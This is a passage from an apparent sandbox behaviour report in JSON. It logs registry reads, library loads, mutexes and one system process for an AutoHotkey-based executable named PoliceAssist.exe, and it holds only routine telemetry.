"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl" ], "write_keys": [], "delete_keys": [], "executed_commands": [ "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" ], "resolved_apis": [ "ntdll.dll.RtlWow64GetCurrentMachine", "ntdll.dll.RtlWow64IsWowGuestMachineSupported" ], "mutexes": [ "Local\\SM0:3308:304:WilStaging_02", "AHK Keybd", "AHK Mouse" ], "created_services": [], "started_services": [] }, "enhanced": [ { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,291", "eid": 1, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,291", "eid": 2, "data": { "file": "C:\\Windows\\System32\\rsaenh.dll", "pathtofile": null, "moduleaddress": "0x7ffedfb90000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:28,400", "eid": 3, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,697", "eid": 4, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,697", "eid": 5, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,697", "eid": 6, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,697", "eid": 7, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,713", "eid": 8, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,744", "eid": 9, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,744", "eid": 10, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,760", "eid": 11, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,775", "eid": 12, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,791", "eid": 13, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,806", "eid": 14, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,822", "eid": 15, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,838", "eid": 16, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,853", "eid": 17, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,869", "eid": 18, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,885", "eid": 19, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:35,900", "eid": 20, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:36,322", "eid": 21, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:36,322", "eid": 22, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:36,322", "eid": 23, "data": { "file": "shell32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2330000" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,016", "eid": 24, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,016", "eid": 25, "data": { "file": "LPK", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,016", "eid": 26, "data": { "file": "GDI32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,047", "eid": 27, "data": { "file": "C:\\Windows\\system32\\rpcss.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,047", "eid": 28, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,047", "eid": 29, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,047", "eid": 30, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,047", "eid": 31, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,047", "eid": 32, "data": { "file": "C:\\Windows\\System32\\uxtheme.dll", "pathtofile": null, "moduleaddress": "0x7ffede5b0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,047", "eid": 33, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,062", "eid": 34, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme", "content": "1" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 35, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 36, "data": { "file": "user32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 37, "data": { "file": "user32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 38, "data": { "file": "user32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 39, "data": { "file": "kernel32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 40, "data": { "file": "comctl32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,062", "eid": 41, "data": { "file": "gdi32", "pathtofile": null, "moduleaddress": null } }, { "event": "findwindow", "object": "windowname", "timestamp": "2025-11-20 10:58:26,062", "eid": 42, "data": { "classname": "AutoHotkey", "windowname": "C:\\Temp\\PoliceAssist.exe" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,062", "eid": 43, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,062", "eid": 44, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,062", "eid": 45, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,062", "eid": 46, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,078", "eid": 47, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,078", "eid": 48, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,094", "eid": 49, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,094", "eid": 50, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "content": "C:\\Windows\\Fonts\\staticcache.dat" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 51, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 52, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "content": "SimSun-ExtB" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 53, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 54, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 55, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 56, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 57, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 58, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 59, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 60, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 61, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 62, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 63, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 64, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 65, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 66, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,109", "eid": 67, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": "0x7ffecf5a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,109", "eid": 68, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 69, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "content": "kernel32.dll" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,109", "eid": 70, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x7ffee1660000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,109", "eid": 71, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 72, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,109", "eid": 73, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru", "content": "{0000004A-57EE-1E5C-00B4-D0000BB1E11E}" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,109", "eid": 74, "data": { "file": "user32", "pathtofile": null, "moduleaddress": "0x7ffee1f70000" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,125", "eid": 75, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,125", "eid": 76, "data": { "file": "comctl32", "pathtofile": null, "moduleaddress": "0x7ffecf5a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,125", "eid": 77, "data": { "file": null, "pathtofile": null, "moduleaddress": null } }, { "event": "findwindow", "object": "windowname", "timestamp": "2025-11-20 10:58:26,141", "eid": 78, "data": { "classname": "Shell_TrayWnd", "windowname": "" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,141", "eid": 79, "data": { "file": "api-ms-win-eventing-provider-l1-1-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,141", "eid": 80, "data": { "file": "api-ms-win-core-synch-l1-2-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,156", "eid": 81, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 82, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 83, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name", "content": "ProgramFilesX86" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 84, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 85, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 86, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 87, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 88, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 89, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName", "content": "@%SystemRoot%\\system32\\shell32.dll,-21817" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 90, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 91, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 92, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 93, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 94, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 95, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 96, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 97, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 98, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 99, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 100, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 101, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 102, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 103, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)", "content": "C:\\Program Files (x86)" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 104, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 105, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name", "content": "ProgramFilesX64" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 106, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 107, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 108, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 109, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 110, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 111, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 112, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 113, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 114, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 115, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 116, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 117, "data": { "regkey": 